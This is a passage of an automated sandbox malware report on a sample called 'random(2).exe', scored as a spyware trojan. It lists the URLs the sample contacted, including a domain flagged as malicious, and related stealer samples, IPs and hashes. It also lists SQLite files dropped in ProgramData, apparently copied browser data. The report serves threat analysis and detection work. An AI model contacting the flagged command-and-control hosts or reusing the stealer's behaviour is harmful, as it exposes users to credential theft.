                                                                          https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.random(2).exe, 00000000.00000003.1542133764.0000000005B0D000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1542364026.0000000005B0E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=random(2).exe, 00000000.00000003.1341512137.0000000005B2C000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1340703085.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1342026490.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, A208202A6FDD4002.dat.0.drfalse
                                                                              		high
                                                                              http://crl.rootca1.amazontrust.com/rootca1.crl0random(2).exe, 00000000.00000003.1366352677.0000000005B40000.00000004.00000800.00020000.00000000.sdmp, B7D4B54EA5C608E5.dat.0.drfalse
                                                                                		high
                                                                                http://ocsp.rootca1.amazontrust.com0:random(2).exe, 00000000.00000003.1366352677.0000000005B40000.00000004.00000800.00020000.00000000.sdmp, B7D4B54EA5C608E5.dat.0.drfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://earthsymphzony.today/api288random(2).exe, 00000000.00000003.1593600134.00000000011CB000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000002.1595595282.00000000011CB000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1592957728.00000000011CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: malware
                                                                                		unknown
                                                                                https://www.ecosia.org/newtab/random(2).exe, 00000000.00000003.1342785210.0000000005B2B000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1341512137.0000000005B2C000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1340703085.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1342026490.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, A208202A6FDD4002.dat.0.drfalse
                                                                                  		high
                                                                                  https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brCAB34A9C016C4162.dat.0.drfalse
                                                                                    		high
                                                                                    https://earthsymphzony.today/a$random(2).exe, 00000000.00000003.1542414145.0000000001207000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: malware
                                                                                    		unknown
                                                                                    https://www.cloudflare.com/5xx-error-landingrandom(2).exe, 00000000.00000003.1309766072.0000000001207000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1310008327.00000000011CB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://ac.ecosia.org/autocomplete?q=random(2).exe, 00000000.00000003.1342785210.0000000005B2B000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1341512137.0000000005B2C000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1340703085.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1342026490.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, A208202A6FDD4002.dat.0.drfalse
                                                                                        		high
                                                                                        https://bridge.sfrandom(2).exe, 00000000.00000003.1557258128.0000000005B0D000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1558684542.0000000005B0D000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1567247573.0000000005B0D000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000002.1597998557.0000000005B0D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        https://earthsymphzony.today/apijrandom(2).exe, 00000000.00000002.1595725997.000000000121F000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1558835674.000000000121F000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1582475958.000000000121B000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1567432553.000000000120D000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1557428973.0000000001215000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: malware
                                                                                        		unknown
                                                                                        https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgrandom(2).exe, 00000000.00000003.1542133764.0000000005B0D000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1542748938.0000000005B0D000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1557258128.0000000005B0D000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1558684542.0000000005B0D000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1567247573.0000000005B0D000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1546836990.0000000005B0D000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000002.1597998557.0000000005B0D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        https://earthsymphzony.today/apicrandom(2).exe, 00000000.00000003.1309813518.00000000011B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: malware
                                                                                        		unknown
                                                                                        http://crt.rootca1.amazontrust.com/rootca1.cer0?random(2).exe, 00000000.00000003.1366352677.0000000005B40000.00000004.00000800.00020000.00000000.sdmp, B7D4B54EA5C608E5.dat.0.drfalse
                                                                                          		high
                                                                                          https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&urandom(2).exe, 00000000.00000003.1542133764.0000000005B0D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9erandom(2).exe, 00000000.00000003.1542133764.0000000005B0D000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1542748938.0000000005B0D000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1542364026.0000000005B0E000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1546836990.0000000005B0D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpgrandom(2).exe, 00000000.00000003.1542133764.0000000005B0D000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1542364026.0000000005B0E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://earthsymphzony.today/apimerandom(2).exe, 00000000.00000002.1595725997.000000000121F000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1558835674.000000000121F000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1582475958.000000000121B000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1567432553.000000000120D000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1557428973.0000000001215000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: malware
                                                                                                		unknown
                                                                                                https://support.mozilla.orgCAB34A9C016C4162.dat.0.drfalse
                                                                                                  		high
                                                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=random(2).exe, 00000000.00000003.1342785210.0000000005B2B000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1341512137.0000000005B2C000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1340703085.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1342026490.0000000005B29000.00000004.00000800.00020000.00000000.sdmp, A208202A6FDD4002.dat.0.drfalse
                                                                                                    		high
                                                                                                    https://earthsymphzony.today/apiyrandom(2).exe, 00000000.00000002.1595725997.000000000121F000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1582475958.000000000121B000.00000004.00000020.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1567432553.000000000120D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: malware
                                                                                                    		unknown
                                                                                                    https://earthsymphzony.today/apixrandom(2).exe, 00000000.00000002.1597998557.0000000005B0D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: malware
                                                                                                    		unknown
                                                                                                    https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&ctarandom(2).exe, 00000000.00000003.1542133764.0000000005B0D000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1542748938.0000000005B0D000.00000004.00000800.00020000.00000000.sdmp, random(2).exe, 00000000.00000003.1546836990.0000000005B0D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high

                                                                                                      World Map of Contacted IPs

                                                                                                      • No. of IPs < 25%
                                                                                                      • 25% < No. of IPs < 50%
                                                                                                      • 50% < No. of IPs < 75%
                                                                                                      • 75% < No. of IPs

                                                                                                      Public IPs

                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                      104.21.64.1
                                                                                                      		earthsymphzony.todayUnited States
                                                                                                      		13335CLOUDFLARENETUStrue

                                                                                                      General Information

                                                                                                      Joe Sandbox version:42.0.0 Malachite
                                                                                                      Analysis ID:1629897
                                                                                                      Start date and time:2025-03-05 09:15:54 +01:00
                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                      Overall analysis duration:0h 5m 24s
                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                      Report type:full
                                                                                                      Cookbook file name:default.jbs
                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                      Number of analysed new started processes analysed:7
                                                                                                      Number of new started drivers analysed:0
                                                                                                      Number of existing processes analysed:0
                                                                                                      Number of existing drivers analysed:0
                                                                                                      Number of injected processes analysed:0
                                                                                                      Technologies:
                                                                                                      • HCA enabled
                                                                                                      • EGA enabled
                                                                                                      • AMSI enabled
                                                                                                      Analysis Mode:default
                                                                                                      Analysis stop reason:Timeout
                                                                                                      Sample name:random(2).exe
                                                                                                      Detection:MAL
                                                                                                      Classification:mal100.troj.spyw.evad.winEXE@1/12@9/1
                                                                                                      EGA Information:Failed
                                                                                                      HCA Information:
                                                                                                      • Successful, ratio: 100%
                                                                                                      • Number of executed functions: 0
                                                                                                      • Number of non-executed functions: 4
                                                                                                      Cookbook Comments:
                                                                                                      • Found application associated with file extension: .exe

                                                                                                      Warnings

                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                      • Excluded IPs from analysis (whitelisted): 13.107.246.60, 4.245.163.56
                                                                                                      • Excluded domains from analysis (whitelisted): 6.0.1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.7.0.0.0.0.3.0.1.3.0.6.2.ip6.arpa, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                                                                      • Execution Graph export aborted for target random(2).exe, PID 6644 because there are no executed function
                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                      • Report size getting too big, too many NtOpenFile calls found.
                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                      • Report size getting too big, too many NtQueryDirectoryFile calls found.
                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                      Simulations

                                                                                                      Behavior and APIs

                                                                                                      TimeTypeDescription
                                                                                                      03:16:53API Interceptor17x Sleep call for process: random(2).exe modified

                                                                                                      Joe Sandbox View / Context

                                                                                                      IPs

                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      104.21.64.1Payment.exeGet hashmaliciousLokibotBrowse
                                                                                                      • touxzw.ir/sccc/five/fre.php
                                                                                                      7RryusxiMtHBz80.exeGet hashmaliciousLokibotBrowse
                                                                                                      • touxzw.ir/sss2/five/fre.php
                                                                                                      Request for quotation -6001845515-XLSX.exeGet hashmaliciousLokibotBrowse
                                                                                                      • touxzw.ir/tking3/five/fre.php
                                                                                                      vsf098633534.exeGet hashmaliciousLokibotBrowse
                                                                                                      • touxzw.ir/sccc/five/fre.php
                                                                                                      laser.ps1Get hashmaliciousFormBookBrowse
                                                                                                      • www.lucynoel6465.shop/jgkl/
                                                                                                      UPDATED SOA.pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.shlomi.app/t3l4/
                                                                                                      QUOTE OF DRY DOCK REPAIR.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.arryongro-nambe.live/ljgq/
                                                                                                      QUOTATION NO REQ-19-000640.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.askvtwv8.top/2875/
                                                                                                      Revised Order Confirmation.exeGet hashmaliciousFormBookBrowse
                                                                                                      • www.lucynoel6465.shop/hbfq/
                                                                                                      UPIlkrNpsh.exeGet hashmaliciousUnknownBrowse
                                                                                                      • xerecao.cc/

                                                                                                      Domains

                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      earthsymphzony.todayxIwQcY1fc4.exeGet hashmaliciousAmadey, GCleaner, LummaC Stealer, PureLog StealerBrowse
                                                                                                      • 104.21.64.1
                                                                                                      d5Wai5fIAK.exeGet hashmaliciousAmadey, GCleaner, LummaC Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                      • 104.21.96.1

                                                                                                      ASNs

                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      CLOUDFLARENETUShttps://factuur02282025.hobroz.com/A72ECwdoRHW41EG3Gmp8VxXRzNoyMOj2Tb8ustfmZ3YbxuxVY6iqBeY3peTXljUF9rQyiBI9ykCHKooFgnf2WmWeAJO6ANfL5wdgJvhDvcajapOZGnzcrqtbhL9DDLocPstrZhMa7g4oQsSiJHNE1S/verifyGet hashmaliciousUnknownBrowse
                                                                                                      • 188.114.96.3
                                                                                                      random(3).exeGet hashmaliciousLummaC StealerBrowse
                                                                                                      • 104.21.31.208
                                                                                                      JqGBbm7.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                      • 104.21.31.208
                                                                                                      MCxU5Fj.exeGet hashmaliciousLummaC Stealer, PureLog StealerBrowse
                                                                                                      • 188.114.97.3
                                                                                                      https://variotok.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                      • 104.18.95.41
                                                                                                      virut' in file 'Setup.exe', during attempted open by 'explorer.exe'Get hashmaliciousUnknownBrowse
                                                                                                      • 104.18.26.149
                                                                                                      GMOgZgNpNu.exeGet hashmaliciousAmadey, LummaC StealerBrowse
                                                                                                      • 172.67.179.246
                                                                                                      xIwQcY1fc4.exeGet hashmaliciousAmadey, GCleaner, LummaC Stealer, PureLog StealerBrowse
                                                                                                      • 104.21.31.208
                                                                                                      Payment copy-8899.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 172.67.148.163
                                                                                                      https://040030025.blob.core.windows.net/factura/index.htmlGet hashmaliciousPhisherBrowse
                                                                                                      • 1.1.1.1

                                                                                                      JA3 Fingerprints

                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      a0e9f5d64349fb13191bc781f81f42e1random(3).exeGet hashmaliciousLummaC StealerBrowse
                                                                                                      • 104.21.64.1
                                                                                                      JqGBbm7.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                      • 104.21.64.1
                                                                                                      MCxU5Fj.exeGet hashmaliciousLummaC Stealer, PureLog StealerBrowse
                                                                                                      • 104.21.64.1
                                                                                                      GMOgZgNpNu.exeGet hashmaliciousAmadey, LummaC StealerBrowse
                                                                                                      • 104.21.64.1
                                                                                                      xIwQcY1fc4.exeGet hashmaliciousAmadey, GCleaner, LummaC Stealer, PureLog StealerBrowse
                                                                                                      • 104.21.64.1
                                                                                                      transferencia HSBC.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                      • 104.21.64.1
                                                                                                      Order Confirmation.xlsGet hashmaliciousUnknownBrowse
                                                                                                      • 104.21.64.1
                                                                                                      transferencia HSBC.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                      • 104.21.64.1
                                                                                                      d5Wai5fIAK.exeGet hashmaliciousAmadey, GCleaner, LummaC Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                      • 104.21.64.1
                                                                                                      VER_3316ARUGVHQMejzy7451UUFA.vbsGet hashmaliciousUnknownBrowse
                                                                                                      • 104.21.64.1

                                                                                                      Dropped Files

                                                                                                      No context

                                                                                                      Created / dropped Files

                                                                                                      C:\ProgramData\3FD1893C08A53274.dat

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\random(2).exe
                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                      Category:dropped
                                                                                                      Size (bytes):20480
                                                                                                      Entropy (8bit):0.6732424250451717
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                      MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                      SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                      SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                      SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                      Malicious:false
                                                                                                      Reputation:high, very likely benign file
                                                                                                      Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                      C:\ProgramData\A208202A6FDD4002.dat

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\random(2).exe
                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                      Category:dropped
                                                                                                      Size (bytes):106496
                                                                                                      Entropy (8bit):1.137181696973627
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
                                                                                                      MD5:2D903A087A0C793BDB82F6426B1E8EFB
                                                                                                      SHA1:E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
                                                                                                      SHA-256:AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
                                                                                                      SHA-512:90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
                                                                                                      Malicious:false
                                                                                                      Reputation:moderate, very likely benign file
                                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                      C:\ProgramData\A5D70FE1DD113C55.dat

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\random(2).exe
                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                      Category:dropped
                                                                                                      Size (bytes):40960
                                                                                                      Entropy (8bit):0.8553638852307782
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                      Malicious:false
                                                                                                      Reputation:high, very likely benign file
                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                      C:\ProgramData\A905D00EECF1C7E3.dat

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\random(2).exe
                                                                                                      File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                      Category:dropped
                                                                                                      Size (bytes):98304
                                                                                                      Entropy (8bit):0.08235737944063153
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                      MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                      SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                      SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                      SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                      Malicious:false
                                                                                                      Reputation:high, very likely benign file
                                                                                                      Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                      C:\ProgramData\B7D4B54EA5C608E5.dat

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\random(2).exe
                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 7, database pages 7, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                      Category:dropped
                                                                                                      Size (bytes):229376
                                                                                                      Entropy (8bit):0.6427006845395496
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:384:A1zkVmvQhyn+Zoz67NNlXMM6333Jp/LKXKN8/N7ty:AmzMMaCm
                                                                                                      MD5:6CA0EA47AA85DCD76B93813012C88F5C
                                                                                                      SHA1:9E7DBE4BD585D31BBE548864FBAD5EDF203FA585
                                                                                                      SHA-256:D6F41AFDC2FEF2D0CDF9A3325488A2530C828EA1D76D51DEE2EF6005F14F6FF2
                                                                                                      SHA-512:1F9CAE33E76C22048363702B4DEF76FEB52BC7F98C1DBC3CFF311F553756069000C9EE0C64B505489D73591AF99EDCD19FAE5DB55C62BFE9A5D6080A84763ABD
                                                                                                      Malicious:false
                                                                                                      Preview:SQLite format 3......@ ..........................................................................j......z..{...{.{j{*z.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                      C:\ProgramData\BD860E4BC5A83783.dat

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\random(2).exe
                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                      Category:dropped
                                                                                                      Size (bytes):51200
                                                                                                      Entropy (8bit):0.8746135976761988
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                      Malicious:false
                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                      C:\ProgramData\BEA8FC204FE38C69.dat

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\random(2).exe
                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 5
                                                                                                      Category:dropped
                                                                                                      Size (bytes):20480
                                                                                                      Entropy (8bit):0.848598812124929
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:TLVF1kwNbXYFpFNYcw+6UwcQVXH5fBODYfOg1ZAJFF0DiUhQ5de5SjhXE1:ThFawNLopFgU10XJBODqzqFF0DYde5P
                                                                                                      MD5:9664DAA86F8917816B588C715D97BE07
                                                                                                      SHA1:FAD9771763CD861ED8F3A57004C4B371422B7761
                                                                                                      SHA-256:8FED359D88F0588829BA60D236269B2528742F7F66DF3ACF22B32B8F883FE785
                                                                                                      SHA-512:E551D5CC3D5709EE00F85BB92A25DDC96112A4357DFEA3D859559D47DB30FEBD2FD36BDFA2BEC6DCA63D3E233996E9FCD2237F92CEE5B32BA8D7F2E1913B2DA9
                                                                                                      Malicious:false
                                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                      C:\ProgramData\C16F69354BD2FED4.dat

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\random(2).exe
                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                                                      Category:dropped
                                                                                                      Size (bytes):159744
                                                                                                      Entropy (8bit):0.5394293526345721
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                                                      MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                                                      SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                                                      SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                                                      SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                                                      Malicious:false
                                                                                                      Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                      C:\ProgramData\CAB34A9C016C4162.dat

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\random(2).exe
                                                                                                      File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                      Category:dropped
                                                                                                      Size (bytes):5242880
                                                                                                      Entropy (8bit):0.03786218306281921
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:58rJQaXoMXp0VW9FxWB2IGKhNbxrO3Dpvu2HI:58r54w0VW3xWB2ohFQ3Y2
                                                                                                      MD5:4BB4A37B8E93E9B0F5D3DF275799D45E
                                                                                                      SHA1:E27DF7CC49B0D145140C119A99C1BBAA9ECCE8F7
                                                                                                      SHA-256:89BC0F21671C244C40A9EA42893B508858AD6E1E26AC16F2BD507C3E8CBB3CF7
                                                                                                      SHA-512:F2FC9067EF11DC3B719507B97C76A19B9E976D143A2FD11474B8D2A2848A706AFCA316A95FEEBA644099497A95E1C426CDAB923D5A70619018E1543FEF3182DB
                                                                                                      Malicious:false
                                                                                                      Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                      C:\ProgramData\D36E55C0B3DC0FD6.dat

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\random(2).exe
                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                      Category:dropped
                                                                                                      Size (bytes):155648
                                                                                                      Entropy (8bit):0.5407252242845243
                                                                                                      Encrypted:false
